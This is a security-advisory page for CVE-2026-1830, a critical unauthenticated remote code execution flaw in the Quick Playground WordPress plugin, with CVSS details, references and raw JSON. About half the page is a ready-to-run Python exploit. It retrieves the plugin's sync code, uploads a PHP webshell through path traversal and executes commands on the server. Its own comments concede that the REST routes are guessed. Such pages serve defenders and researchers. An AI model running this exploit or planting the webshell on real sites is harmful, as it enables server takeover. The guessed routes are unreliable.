Security Vulnerability Report
CVE-2026-1830 CVSS 9.8 CRITICAL

CVE-2026-1830

Published: 2026-04-09 05:16:03
Last Modified: 2026-04-24 18:03:42

Description

The Quick Playground plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.1. This is due to insufficient authorization checks on REST API endpoints that expose a sync code and allow arbitrary file uploads. This makes it possible for unauthenticated attackers to retrieve the sync code, upload PHP files with path traversal, and achieve remote code execution on the server.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Quick Playground <= 1.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import sys
import requests

# Target configuration
target_url = "http://example.com"

# Step 1: Retrieve the sync code from the vulnerable endpoint.
# The advisory says a REST endpoint exposes the sync code; the exact route used
# here is an assumption of this PoC and is not confirmed by the advisory.
sync_endpoint = f"{target_url}/wp-json/quick-playground/v1/sync"
try:
    response = requests.get(sync_endpoint, timeout=10)
except Exception as e:
    print(f"[-] Failed to retrieve sync code: {e}")
    sys.exit(1)
if response.status_code != 200:
    # Without a sync code there is nothing to upload with; stop here instead of
    # continuing with an undefined variable.
    print(f"[-] Failed to retrieve sync code. Status: {response.status_code}")
    sys.exit(1)
# Assuming the API returns the code in the response body (or as plain JSON)
sync_code = response.text.strip()
print(f"[+] Sync code retrieved: {sync_code}")

# Step 2: Upload a PHP file using path traversal.
# The advisory describes an unauthenticated upload endpoint; this route is
# likewise assumed by the PoC.
upload_endpoint = f"{target_url}/wp-json/quick-playground/v1/upload"

# PHP code to execute system commands (webshell)
php_payload = "<?php system($_GET['cmd']); ?>"

# Multipart file plus form fields: the sync code and a traversal path
files = {"file": ("shell.php", php_payload, "application/x-php")}
data = {
    "sync_code": sync_code,
    # Path traversal to land the file in a web-accessible directory
    "path": "../../uploads/",
}

try:
    upload_response = requests.post(upload_endpoint, files=files, data=data, timeout=10)
    if upload_response.status_code == 200:
        print("[+] File uploaded successfully.")
        # Step 3: Execute the code (verifying the exploit)
        shell_url = f"{target_url}/wp-content/uploads/shell.php?cmd=whoami"
        exec_response = requests.get(shell_url, timeout=10)
        if exec_response.status_code == 200:
            print(f"[+] RCE Successful! Output: {exec_response.text}")
        else:
            print("[-] Upload succeeded but execution failed.")
    else:
        print(f"[-] Upload failed. Status: {upload_response.status_code}")
except Exception as e:
    print(f"[-] Error during exploitation: {e}")

References

https://plugins.trac.wordpress.org/browser/quick-playground/trunk/api.php#L39
https://plugins.trac.wordpress.org/browser/quick-playground/trunk/expro-api.php#L419
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3500839%40quick-playground&new=3500839%40quick-playground&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/308cd28a-a477-4bc6-a392-ad5a9eca1cb5?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1830", "sourceIdentifier": "[email protected]", "published": "2026-04-09T05:16:03.420", "lastModified": "2026-04-24T18:03:42.203", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Quick Playground plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.1. This is due to insufficient authorization checks on REST API endpoints that expose a sync code and allow arbitrary file uploads. This makes it possible for unauthenticated attackers to retrieve the sync code, upload PHP files with path traversal, and achieve remote code execution on the server."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/quick-playground/trunk/api.php#L39", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/quick-playground/trunk/expro-api.php#L419", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3500839%40quick-playground&new=3500839%40quick-playground&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/308cd28a-a477-4bc6-a392-ad5a9eca1cb5?source=cve", "source": "[email protected]"}]}}